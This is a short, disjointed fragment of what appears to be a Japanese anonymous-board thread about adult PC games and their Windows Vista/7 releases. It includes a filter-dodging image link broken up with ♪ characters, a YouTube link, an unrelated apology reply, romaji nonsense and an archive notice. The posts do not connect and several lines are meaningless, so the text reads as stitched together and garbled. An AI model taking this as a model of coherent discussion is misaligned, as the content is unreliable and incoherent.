さっくりとしてしかも明るく健康的にエロい良い買い物をした 修業旅行はvistaやwin7で出したのに
なんで臨海合宿は出さないんだろ
臨海合宿すごいやりたい 神スレ発見しちゃった
VIP無効化されたサイトもあるぞ
時間との戦いだな!!!
lib♪erty♪artworx.co♪m/spggo6/1113.jpg
♪ トル お助けできず申し訳ございませんでした。ですが解決してよかったです!! https://www.youtube.com/watch?v=8JmdDlYnXOU
kawashi kawasa
4:04〜 mitakotonain kekkkouattawa ■ このスレッドは過去ログ倉庫に格納されています